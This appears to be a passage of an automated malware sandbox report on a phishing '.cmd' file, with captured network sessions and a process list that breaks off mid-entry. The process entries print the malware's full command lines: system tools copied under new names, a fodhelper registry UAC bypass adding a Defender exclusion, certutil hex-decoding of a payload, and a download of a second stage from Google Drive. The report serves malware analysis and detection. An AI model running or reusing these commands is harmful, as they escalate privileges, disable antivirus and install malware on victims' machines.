2024-04-26 19:56:03 UTC | 899 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-04-26 19:56:03 UTC | 1255 | IN | Data Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 48 6e 6e 66 74 30 44 61 41 53 4b 6b 55 2d 65 72 33 31 79 30 70 50 51 70 5a 6b 54 50 68 63 70 45 6d
Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="Hnnft0DaASKkU-er31y0pPQpZkTPhcpEm
2024-04-26 19:56:03 UTC | 960 | IN | Data Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e
Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin


Session ID | Source IP | Source Port | Destination IP | Destination Port
6 | 192.168.2.5 | 49717 | 23.35.153.42 | 443

Timestamp | Bytes transferred | Direction | Data
2024-04-26 19:56:05 UTC | 185 | OUT | GET /api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop HTTP/1.1
Accept-Encoding: gzip, deflate
Host: cxcs.microsoft.net
Connection: Keep-Alive
2024-04-26 19:56:05 UTC | 127 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 26
Date: Fri, 26 Apr 2024 19:56:05 GMT
Connection: close
2024-04-26 19:56:05 UTC | 26 | IN | Data Raw: 3c 68 74 6d 6c 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 74 6d 6c 3e
Data Ascii: <html>404 Not Found</html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49719 | 23.204.76.112 | 443

Timestamp | Bytes transferred | Direction | Data
2024-04-26 19:56:07 UTC | 161 | OUT | HEAD /fs/windows/config.json HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    User-Agent: Microsoft BITS/7.8
    Host: fs.microsoft.com
2024-04-26 19:56:07 UTC | 466 | IN | HTTP/1.1 200 OK
    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
    Content-Type: application/octet-stream
    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
    Server: ECAcc (chd/0758)
    X-CID: 11
    X-Ms-ApiVersion: Distribute 1.2
    X-Ms-Region: prod-eus-z1
    Cache-Control: public, max-age=40058
    Date: Fri, 26 Apr 2024 19:56:07 GMT
    Connection: close
    X-CID: 2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49720 | 23.204.76.112 | 443

Timestamp | Bytes transferred | Direction | Data
2024-04-26 19:56:07 UTC | 239 | OUT | GET /fs/windows/config.json HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
    Range: bytes=0-2147483646
    User-Agent: Microsoft BITS/7.8
    Host: fs.microsoft.com
2024-04-26 19:56:07 UTC | 530 | IN | HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
    ApiVersion: Distribute 1.1
    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
    X-Azure-Ref: 0DZ+oYgAAAABSxwJpMgMuSLkfS640ajfFQVRBRURHRTEyMTkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
    Cache-Control: public, max-age=40052
    Date: Fri, 26 Apr 2024 19:56:07 GMT
    Content-Length: 55
    Connection: close
    X-CID: 2
2024-04-26 19:56:07 UTC | 55 | IN | Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49721 | 40.127.169.103 | 443

Timestamp | Bytes transferred | Direction | Data
2024-04-26 19:56:14 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DTLaKFkphhrsh9g&MD=4mKMnfvA HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
    Host: slscr.update.microsoft.com
2024-04-26 19:56:14 UTC | 560 | IN | HTTP/1.1 200 OK
    Cache-Control: no-cache
    Pragma: no-cache
    Content-Type: application/octet-stream
    Expires: -1
    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
    MS-CorrelationId: 4f9974b6-7202-4fe9-ad3c-6e4f4ca9e81c
    MS-RequestId: b684c58f-6411-452a-92f7-6f61221f83d6
    MS-CV: NuuznHB8kUqzE651.0
    X-Microsoft-SLSClientCache: 2880
    Content-Disposition: attachment; filename=environment.cab
    X-Content-Type-Options: nosniff
    Date: Fri, 26 Apr 2024 19:56:13 GMT
    Connection: close
    Content-Length: 24490
2024-04-26 19:56:14 UTC | 15824 | IN | [binary cabinet data (MSCF header, environment.cab); raw hex dump omitted]
2024-04-26 19:56:14 UTC | 8666 | IN | [binary cabinet data, continued; raw hex dump omitted]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49729 | 142.250.217.193 | 443 | 5228 | C:\Users\Public\Libraries\sppsvc.pif

Timestamp | Bytes transferred | Direction | Data
2024-04-26 19:56:19 UTC | 223 | OUT | GET /download?id=1SisUFlJTSsT_W48Ix2VwvCg8Ow1r24hB&export=download HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: drive.usercontent.google.com
2024-04-26 19:56:20 UTC | 4813 | IN | HTTP/1.1 200 OK
    X-GUploader-UploadID: ABPtcPrPJhsQYhTR6i4uc3Eplk-8Fu2KFjDQRABdg9TsIWIGY_cz4Nts0GIvAOV_782Qm3bltNSyUu9QMQ
    Content-Type: application/octet-stream
    Content-Security-Policy: sandbox
    Content-Security-Policy: default-src 'none'
    Content-Security-Policy: frame-ancestors 'none'
    X-Content-Security-Policy: sandbox
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Resource-Policy: same-site
    X-Content-Type-Options: nosniff
    Content-Disposition: attachment; filename="255_Kpeyvrohotl"
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: false
    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Dom [TRUNCATED]
    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
    Accept-Ranges: bytes
    Content-Length: 1118336
    Last-Modified: Fri, 26 Apr 2024 13:05:15 GMT
    Date: Fri, 26 Apr 2024 19:56:20 GMT
    Expires: Fri, 26 Apr 2024 19:56:20 GMT
    Cache-Control: private, max-age=0
    X-Goog-Hash: crc32c=THHw3g==
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close
2024-04-26 19:56:20 UTC | 4813 | IN | [base64-encoded payload chunk; raw dump omitted]
2024-04-26 19:56:20 UTC | 4813 | IN | [base64-encoded payload chunk; raw dump omitted]
2024-04-26 19:56:20 UTC | 261 | IN | [base64-encoded payload chunk; raw dump omitted]
2024-04-26 19:56:20 UTC | 1255 | IN | [base64-encoded payload chunk; raw dump omitted]
2024-04-26 19:56:20 UTC | 66 | IN | [base64-encoded payload chunk; raw dump omitted]
2024-04-26 19:56:20 UTC | 1255 | IN | [base64-encoded payload chunk; raw dump omitted]
2024-04-26 19:56:20 UTC | 1255 | IN | [base64-encoded payload chunk; raw dump omitted]
2024-04-26 19:56:20 UTC | 1255 | IN | [base64-encoded payload chunk; raw dump omitted]
2024-04-26 19:56:20 UTC | 1255 | IN | [base64-encoded payload chunk; raw dump omitted]
2024-04-26 19:56:20 UTC | 1255 | IN | [base64-encoded payload chunk; raw dump omitted]


Session ID: 11 | Source IP: 192.168.2.5 | Source Port: 49732 | Destination IP: 40.127.169.103 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-04-26 19:56:56 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DTLaKFkphhrsh9g&MD=4mKMnfvA HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                  Host: slscr.update.microsoft.com
2024-04-26 19:56:57 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Expires: -1
                                                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                  ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                                  MS-CorrelationId: 1396d6b2-b729-4e36-924b-d4d9bb8930cd
                                                                                                                  MS-RequestId: 9727b9c5-3edc-4e4b-9f78-a33fb903f0c9
                                                                                                                  MS-CV: LExsCG7ko0WtqBHn.0
                                                                                                                  X-Microsoft-SLSClientCache: 2160
                                                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Date: Fri, 26 Apr 2024 19:56:56 GMT
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 25457


                                                                                                                  Target ID:0
                                                                                                                  Start time:21:55:53
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "
                                                                                                                  Imagebase:0x7ff60e400000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:1
                                                                                                                  Start time:21:55:53
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:2
                                                                                                                  Start time:21:55:53
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Windows\System32\extrac32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
                                                                                                                  Imagebase:0x7ff7050c0000
                                                                                                                  File size:35'328 bytes
                                                                                                                  MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  Target ID:4
                                                                                                                  Start time:21:55:53
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:5
                                                                                                                  Start time:21:55:53
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Windows\System32\extrac32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
                                                                                                                  Imagebase:0x7ff7050c0000
                                                                                                                  File size:35'328 bytes
                                                                                                                  MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  Target ID:6
                                                                                                                  Start time:21:55:54
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:7
                                                                                                                  Start time:21:55:54
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Windows\System32\extrac32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
                                                                                                                  Imagebase:0x7ff7050c0000
                                                                                                                  File size:35'328 bytes
                                                                                                                  MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  Target ID:8
                                                                                                                  Start time:21:55:54
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:9
                                                                                                                  Start time:21:55:54
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\xkn.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
                                                                                                                  Imagebase:0x7ff7039f0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:10
                                                                                                                  Start time:21:55:57
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                                                                                  Imagebase:0x7ff715980000
                                                                                                                  File size:3'242'272 bytes
                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Target ID:12
                                                                                                                  Start time:21:55:58
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1956,i,11964562257046214624,14274192803590327640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                  Imagebase:0x7ff715980000
                                                                                                                  File size:3'242'272 bytes
                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Target ID:13
                                                                                                                  Start time:21:55:59
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:14
                                                                                                                  Start time:21:55:59
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\ger.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                                                                                                                  Imagebase:0x7ff655880000
                                                                                                                  File size:77'312 bytes
                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  Target ID:15
                                                                                                                  Start time:21:56:02
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Windows\System32\fodhelper.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\fodhelper.exe"
                                                                                                                  Imagebase:0x7ff723760000
                                                                                                                  File size:49'664 bytes
                                                                                                                  MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:19
                                                                                                                  Start time:21:56:06
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Windows\System32\SystemSettingsAdminFlows.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
                                                                                                                  Imagebase:0x7ff6f6b90000
                                                                                                                  File size:519'080 bytes
                                                                                                                  MD5 hash:5FA3EEF00388ED6344B4C35BA7CAA460
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:22
                                                                                                                  Start time:21:56:12
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:23
                                                                                                                  Start time:21:56:12
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Windows\System32\extrac32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                  Imagebase:0x7ff7050c0000
                                                                                                                  File size:35'328 bytes
                                                                                                                  MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:24
                                                                                                                  Start time:21:56:13
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:25
                                                                                                                  Start time:21:56:13
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\kn.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
                                                                                                                  Imagebase:0x7ff67de30000
                                                                                                                  File size:1'651'712 bytes
                                                                                                                  MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  Target ID:26
                                                                                                                  Start time:21:56:14
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:27
                                                                                                                  Start time:21:56:14
                                                                                                                  Start date:26/04/2024
